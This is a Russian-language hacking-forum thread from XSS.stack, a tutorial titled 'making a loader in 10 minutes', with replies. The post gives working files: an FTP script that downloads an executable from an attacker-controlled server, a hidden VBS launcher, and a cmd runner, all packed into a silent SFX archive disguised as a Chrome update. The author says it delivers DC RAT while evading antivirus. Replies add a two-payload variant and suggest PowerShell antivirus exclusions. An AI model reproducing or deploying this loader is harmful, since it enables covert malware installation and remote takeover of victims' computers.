• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Делаем 0/1-26 лоадер за 10 минут

сатоши

@Net_Shop_robot
КИДАЛА
Регистрация
17.06.2022
Сообщения
101
Реакции
60
Пожалуйста, обратите внимание, что пользователь заблокирован
Показания antiscan.me
1659418866262.png


1. Нужен FTP сервер и на него нужно загрузить файл что будет подгружать лоадер.

2. Создаём тхт файл называем "ftp" в него прописываем:
Код:
ip сервера/хостинга, или его ссылка. [ Пример: 222.222.2.2 или rovilov.com ]
Логин от FTP. [Пример: vasapro777]
пароль [например: hyipizda]
lcd C:\Program Files [Путь скачивания файла]
binary
get Rovilov.exe [сюда пишем имя файла и расширение]
quit
Пример того что получим:
Код:
rovilov.com
777777
hyipizda
lcd C:\Program Files
binary
get rovilov.exe
quit

3. Создаём файл vbs.vbs и прописываем в него:
Код:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "(fud).cmd" & Chr(34), 0
Set WshShell = Nothing

4. Создаём файл под названием 112.cmd и пишем в него:
Код:
Echo OFF

ftp -s:ftp.txt

Start rovilov.exe [тут пишите имя загружаемого файла]
Сделав все выше сказанные шаги получим:
1659420238786.png

Теперь чтобы это всё работало нужно создать sfx архив с методом сжатия - Максимальный, а так же добавляем комментарий:
Код:
ath=C:\Program Files
Setup=vbs.vbs
Silent=1
Overwrite=1
Update=U
Title:-Chrome [Пишем под что маскируем файл]
Text
{
Updating...
}

После создания архива получим лоадер весом 300кб +
1659420582265.png

Пробовал с DC rat стучит хорошо
 
Пожалуйста, обратите внимание, что пользователь заблокирован
we can even obfuscate vbs and can run powershell script to add our malware in exclusion folder )))
ай донт нау(
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Напоминает мне loader от DcRAT
не копался в нём сказать точно не могу
 
Пожалуйста, обратите внимание, что пользователь заблокирован
можно как то чтоб 2 файла сразу загрузилось?
Я не тестил но предпологаю что:
Содержимое ftp.txt

Код:
rovilov.com
777777
hyipizda
lcd C:\Program Files
binary
get rovilov.exe
get rovilov2.exe
quit
а содержимое 112.cmd

Код:
Echo OFF

ftp -s:ftp.txt

Start rovilov.exe

Start rovilov2.exe
Предполагаю что так ибо мне хватает одного билда
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Говно и палки😆
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Говно и палки😆
эти говнопалки обходят антивирусы, а ты сиди инжекты в експлорер делай, но не пизди потом когда свой говно-паблик-код почистить не сможешь от дефендера дрочно
 
Пожалуйста, обратите внимание, что пользователь заблокирован
эти говнопалки обходят антивирусы, а ты сиди инжекты в експлорер делай, но не пизди потом когда свой говно-паблик-код почистить не сможешь от дефендера дрочно
Инсталы потекли рекой😆
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Инсталы потекли рекой😆
вот че выпук делать на ровном месте. предложи что то лучше, без палок и говна.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
неплохая идея, но райнтайм все равно говно же получится :(
и разве безопасно вот так делать "фуд"? там же айпи адрес сервака палится или не?
 
Последнее редактирование:
неплохая идея, но райнтайм все равно говно же получится :(
и разве безопасно вот так делать "фуд"? там же айпи адрес сервака палится или не?
а ещё данные от фтп паляться, и кто-то может твою х#йню заменить на свою)))
ну а вобще тут дроп на диск идёт, там детект будет в любом случае..
 
а ещё данные от фтп паляться, и кто-то может твою х#йню заменить на свою)))
ну а вобще тут дроп на диск идёт, там детект будет в любом случае..
ну вот, я о том же :(
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх